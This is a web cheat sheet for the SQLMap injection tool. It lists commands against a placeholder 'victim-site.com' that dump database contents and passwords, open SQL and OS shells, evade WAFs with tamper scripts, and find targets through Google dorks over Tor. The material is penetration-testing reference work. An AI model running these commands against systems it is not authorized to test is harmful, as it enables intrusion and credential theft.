SQLMap Cheat Sheet – Quick Start

SQLMap is a python open source Cyber Security testing tool that helps automate the process of exploiting SQL injection vulnerabilities.  It features many options to help you in your testing including support for the following: MySQL, Microsoft SQL Server, Oracle, Firebird, SAP MaxDB, Redshift, Mckoi, Presto, MimerSQL, SQLite, Apache Ignite, FrontBase, and many more. It also supports 6 injection types such as error-based, time-based blind, union query, Boolean-based blind. This tool can also detect password hashes and support for breaking them using a dictionary attack. Below I will provide you with a helpful sqlmap cheat sheet to help you when you are doing your testing.

We found that 8% of analyzed targets had at least one SQLi vulnerability. This was very unexpected. SQL Injections first appeared in 1998. All major development environments and frameworks include tools to eliminate them. SQL Injections should not be so common.

Acunetix

How to get SQLMap

Mac:

  1. Open terminal
  2. Install Homebrew with the following command
ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" < /dev/null 2> /dev/null

3. Install SQLMap:

brew install sqlmap

Linux:

git clone https://github.com/sqlmapproject/sqlmap.git

Windows:

  1. Get Python from: https://www.python.org/downloads/windows/
  2. Download the zip file of sqlmap from sqlmap.org
  3. To run sql map type in the following
python ./sqlmap.py

SQLMap Cheat Sheet Methods

SQLMap Cheat Sheet

Running Standard Test:

1:  Test if website is vulnerable to SQL injection

Checking if website is vulnerable to SQL injection

The example we utilize a standard GET request. This will test different methods of SQL injections

sqlmap –u “https://victim-site.com/product.php?id=1”  

2:  Enumerate all columns in databases

List all databases in the websites DB

sqlmap –u “https://victim-site.com/product.php?id=1”  --dbs

3: List tables

Find out how many tables the database has and what the names are.

sqlmap –u “https://victim-site.com/product.php?id=1”  -D dbname --tables

4: List columns of table selected DB

List all columns of victim table

sqlmap –u “https://victim-site.com/product.php?id=1”  –D dbname  -T tablename  --columns

5: List usernames

Get usernames from victim columns of selected table.

sqlmap –u “https://victim-site.com/product.php?id=1”  –D dbname  -T tablename  -C columnname --dump

6: Extract pwd from victim column

Extract passwords from column

sqlmap –u “https://victim-site.com/product.php?id=1”  –D dbname  –C columname  --dump

Custom Methods:

Test on custom position on POST request method:

Use * to let sqlmap know the postion you want to use for sqlmap payload

sqlmap –u ‘https://victim-site.com/page/abc*’ --dbs

Google Dorks SQLMap method:

sqlmap  -g ‘inurl:”products.php?id”’ –random-agent –f –batch –answer=”extending=N,follow=N,keep=N,exploit=n”

Get SQL Shell

Sqlmap –dbms=mysql –u “https://victim-site.com/login.php” –sql-shell

Get OS Shell

sqlmap  --dbms=mysql –u “https://victim-site.com/login.php” –os-shell

Tor scanning:

sqlmap –u “https://victim-site.com/product.php?id=1” –tor –tor-type=SOCKS5

There are 3 risk values:

  • Risk 1: Default level
  • Risk 2: Heavy query time based injections
  • Risk 3: Adds OR based injections

Levels:

  • Level 2: HTTP Cookie Header Testing
  • Level 3 HTTP User Agent and Referer Header Testing
  • Level 5 Attack the Host Header
sqlmap –u “https://victim-site.com/product.php?id=1” –risk=2 –level=3

Attack Method Choices:

You can let SQLMap know what exploit method you want to use:

  • E: Error Based
  • S: Stacked Queries
  • T: Time Based Blind
  • B: Boolean Based Blind
  • U: Union Query
  • Q: Inline Queries
sqlmap –u “https://victim-site.com/product.php?id=1” –technique=B

Force SSL:

You can use the force SSL flag in SQLMap to utilize SSL in requests.

sqlmap –u “https://victim-site.com/product.php?id=1” –force-ssl

Request File:

Use a request file that has the HTTP request

sqlmap  -r request.txt

Specify Cookie Injection:

Must set level to be 2 or greater.

sqlmap  --cookie=”u_id=1” –u “https://victim-site.com/page.php” –p “u_id” –level 3

Evade WAF and Filters with Tamper Scripts:

Credit to RedCode for this one

sqlmap -u “http://www.victim-site.com/product.php?id=1” — level=5 — risk=3  tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

Resources for some switches:


    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -d DIRECT           Connection string for direct database connection
    -l LOGFILE          Parse target(s) from Burp or WebScarab proxy log file
    -m BULKFILE         Scan multiple targets given in a textual file
    -r REQUESTFILE      Load HTTP request from a file
    -g GOOGLEDORK       Process Google dork results as target URLs
    -c CONFIGFILE       Load options from a configuration INI file

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)
    --string=STRING     String to match when query is evaluated to True
    --not-string=NOT..  String to match when query is evaluated to False
    --regexp=REGEXP     Regexp to match when query is evaluated to True
    --code=CODE         HTTP code to match when query is evaluated to True
    --smart             Perform thorough tests only if positive heuristic(s)
    --text-only         Compare pages based only on the textual content
    --titles            Compare pages based only on their titles

If you would like to download the above content your offline reference you can get it here:

Conclusion

SQLMap is a very powerful tool and is great when you want to automate your tasks instead of manually trying out every injection you can think of. There are many more ways to use SQLMap but we have covered the majority use cases for this wonderful tool. We will create a video in the future to demonstrate the techniques we have shown above to help simplify the tool for some users that are visual learners.

Remember there is no replacement to learning how the attacks work manually before learning a tool.  We always recommend you learn how and why something happens before using a tool to do the work for you.

Hope you like the SQLMap cheat sheet we have provided! If you have anything you would like to add to the list please feel free to reach out to us on our contact page.

References:

https://sqlmap.org

https://github.com/sqlmapproject/sqlmap/wiki/Usage

https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423

https://www.acunetix.com/white-papers/acunetix-web-application-vulnerability-report-2020/#sql-injection-sqli


How to get into cyber security field

СYBER SEСURITY So how to get into cyber security field ? Сyber seсurity refers tо the bоdy оf teсhnоlоgies, рrосesses, аnd рrасtiсes designed tо рrоteсt netwоrks, deviсes, рrоgrаms, аnd dаtа…

14 Eyes Surveillance Alliance – Explained

There аre mаny сruсiаl fасtоrs thаt deсide the fаte оf сyberseсurity аnd оnline рrivасy. There аre different аttасk veсtоrs thаt threаten yоur seсurity, thоse inсlude mаlwаre, рhishing, etс. Араrt frоm…